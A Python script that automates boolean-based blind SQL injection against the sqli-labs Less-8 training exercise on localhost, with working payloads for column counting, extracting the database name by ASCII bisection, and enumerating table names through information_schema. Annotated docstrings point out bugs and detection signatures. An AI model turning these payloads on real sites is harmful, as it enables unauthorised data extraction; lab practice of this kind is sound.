sql盲注脚本

# moddemod
# 2019/6/13
# 8:23
# PyCharm

import requests
import re
"""
base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1"
"""
base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1"

class Blind(object):
    """Boolean-based blind SQL injection walker for the sqli-labs Less-8 exercise.

    Every probe is a GET to the module-level ``base_url`` with a SQL fragment
    appended; ``request()`` turns the page into a 1/0 oracle by looking for the
    "You are in..........." banner.  Results are accumulated on the instance
    (``database_name``, ``tables_name``) and echoed with print().

    Defender's note: the traffic this produces is a long run of near-identical
    requests to one endpoint that differ only in a numeric comparison
    (length / ascii() / count), which is a usable signature for WAF rules and
    access-log review.  Parameterised queries remove the condition this class
    depends on.
    """

    def __init__(self, base_url: str) -> None:
        """Initialise result holders.  ``base_url`` is stored but not used by request()."""
        self.base_url = base_url
        self.len_database = 0      # length of database(), set by get_databases()
        self.filed_number = 0      # (sic) not referenced anywhere else in this class
        self.database_name = ""    # characters of database() recovered so far by dichotomy()
        self.char = ""             # last character recovered by either bisection method
        self.tables_number = 0     # table count found by get_tables()
        self.tables_name = ""      # characters of the table name currently being recovered
        self.table_length = 0      # length of the table name currently being recovered



    def request(self, payload: str) -> int:
        """Send ``payload`` appended to the target URL and return the boolean oracle.

        :param payload: SQL fragment appended verbatim to the module-level ``base_url``.
        :return: 1 when the response body matches the banner regex below, else 0.
                 This is the only signal every other method relies on.
        NOTE: reads the module-level ``base_url``, not ``self.base_url``.
        """
        # print(base_url+payload)
        response = requests.get(url=base_url + payload).text
        # Presence of this banner is treated as "condition true"; anything else
        # (including errors or a blank page) counts as false.
        pattern = re.compile(r'You are in\.\.\.\.\.\.\.\.\.\.\.')
        result = re.search(pattern=pattern, string=response)
        if result:
            return 1
        else:
            return 0

    def get_field_number(self) -> int:
        """
        Get the number of columns (fields) by ORDER BY probing.
        http://127.0.0.1/sqli-labs/Less-8/?id=1' order by 3-- +
        :return: the last ORDER BY index that still succeeded; -1 when none of
                 indices 1..9 failed (field_number is then still 0).
        """
        field_number = 0
        for i in range(1, 10):
            payload = '\' order by {0}-- +'.format(i)
            # url = self.base_url + payload
            r = self.request(payload)
            if r == 0:
                # first index that breaks the query is one past the column count
                field_number = i
                break
        return field_number - 1


    def get_version(self) -> None:
        """
        Get the database version.  Stub: not implemented.
        http://127.0.0.1/sqli-labs/Less-8/?id=1' order by 3-- +
        :return: None
        """
        pass

    def get_user(self) -> None:
        """
        Get the account the database is currently logged in as.  Stub: not implemented.
        :return: None
        """
        pass

    def get_databases(self) -> None:
        """
        Get the current database name.
        http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),{0},1))={1} %23
        http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())=8-- +
        :return: None; the name is accumulated in self.database_name by dichotomy()
                 and printed there character by character.
        """

        # Only lengths 1..9 are probed.  There is no break after a hit, so the
        # remaining lengths are still requested after the name has been recovered.
        for i in range(1, 10):
            payload = "' and length(database())={0}-- +".format(i)
            r = self.request(payload)
            if r:
                self.len_database = i
                for j in range(1, self.len_database + 1):
                    # payload = "' and ascii(substr((select database()),{0},1))>1-- +".format(j)
                    # if self.request(payload) == 0:
                    #     return
                    # print(self.dichotomy(j, 65, 127))
                    # one bisection per character position; codes 66..127 are reachable
                    self.dichotomy(j, 65, 127)
                    # return self.database_name

    def dichotomy(self, n: int, min: int, max: int):
        """
        Bisect the ASCII code of character ``n`` of database() using the oracle.
        Uppercase range 65 - 91, or lowercase range 97 - 123.
        payload = "' and ascii(substr((select database()),{0},1))={1}-- +"
        :param n: 1-based character position passed to substr().
        :param min: lower bound of the search interval, exclusive (shadows the builtin).
        :param max: upper bound of the search interval, inclusive (shadows the builtin).
        :return: self.database_name in the terminal case (max - min == 1).  The
                 recursive branches discard the return value, so an outer call
                 usually returns None and the result must be read from the attribute.
        The ">" comparison keeps the invariant min < code <= max, so a code equal
        to the initial ``min`` can never be recovered.
        """

        if max - min == 1:
            self.char = chr(max)
            self.database_name += self.char
            print(self.database_name)
            return self.database_name

        number = int((max + min) / 2)
        payload = "' and ascii(substr((select database()),{0},1))>{1}-- +".format(n, number)
        r = self.request(payload)
        if r:
            self.dichotomy(n, number, max)
        else:
            self.dichotomy(n, min, number)


    def is_true(self, n):
        """Shadowed: the identically named method further down replaces this one.

        Not called anywhere in this file.  Note that dichotomy() mutates
        self.database_name and prints on every terminal call, so using it as a
        predicate here has side effects.
        """
        if self.dichotomy(n, 65, 91):
            return self.dichotomy(n, 65, 91)
        else:
            return self.dichotomy(n, 97, 123)


    def dichotomy_tables(self,num, n, min, max) -> None:
        """
        Bisect the ASCII code of character ``n`` of the ``num``-th table name
        (LIMIT num,1) in the hard-coded schema 0x7365637572697479 (hex literal;
        presumably the lab's 'security' schema, so the class only targets that one).
        Uppercase range 65 - 91, or lowercase range 97 - 123.
        payload = "' and ascii(substr((select database()),{0},1))={1}-- +"
        :param num: 0-based table index used in LIMIT.
        :param n: 1-based character position passed to substr().
        :param min: exclusive lower bound (shadows the builtin).
        :param max: inclusive upper bound (shadows the builtin).
        :return: None; the character is appended to self.tables_name and the
                 partial name printed.  Same min < code <= max invariant as dichotomy().
        """

        if max - min == 1:
            self.char = chr(max)
            self.tables_name += self.char
            print(self.tables_name)
            return


        number = int((max + min) / 2)
        # Note the payload starts with a space and "'and" rather than "' and".
        payload = " 'and  ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479  limit {0},1),{1},1))>{2} -- +".format(num, n, number)
        r = self.request(payload)
        if r:
            self.dichotomy_tables(num, n, number, max)
        else:
            self.dichotomy_tables(num, n, min, number)


    def get_tables(self) -> None:
        """
        Get the table names of the hard-coded schema.
        http://127.0.0.1/sqli-labs/Less-8/?id=1%27and%20(select%20count(*)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20)%3E5%20%23
        'and  ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479  limit 0,1),1,1))>100 %23
        'and length((select table_name from information_schema.tables where table_schema=0x7365637572697479%20 limit 0,1))=6-- +
        :return: None; each name is printed by dichotomy_tables() and
                 self.tables_name is cleared after every table.
        """
        # Table count: first value in 0..9 for which count(*) = i holds.
        for i in range(10):
            payload = "' and (select count(*) from information_schema.tables where table_schema=0x7365637572697479 ) = {} -- +".format(i)
            if self.request(payload):
                self.tables_number = i
                break
        for i in range(self.tables_number):
            # Name lengths are only probed up to 9; longer names are never recovered.
            for j in range(10):
                payload = "'and length((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit {0},1))={1}-- +".format(i, j)
                if self.request(payload):
                    print("第%d个表有%d长" %(i+1, j))
                    self.table_length = j

                    # codes 66..123 reachable with this interval (see dichotomy_tables)
                    for k in range(1, self.table_length + 1):
                        self.dichotomy_tables(i, k, 65, 123)
                    self.tables_name = ""
                    break


    def is_true(self, n):
        """Duplicate of the earlier is_true(); being defined later, this is the one
        bound on the class.  Not called anywhere in this file.  dichotomy() has
        side effects (prints, appends to self.database_name), so this is not a
        pure predicate.
        """
        if self.dichotomy(n, 65, 91):
            return self.dichotomy(n, 65, 91)
        else:
            return self.dichotomy(n, 97, 123)


def test():
    """Drive a table-name enumeration run against the lab target.

    Builds a Blind instance for the Less-8 URL and calls get_tables() only;
    get_databases() is not exercised here.
    """
    walker = Blind(base_url="http://127.0.0.1/sqli-labs/Less-8/?id=1")
    walker.get_tables()

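# Guard the run so importing this module does not immediately fire requests.
if __name__ == "__main__":
    test()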
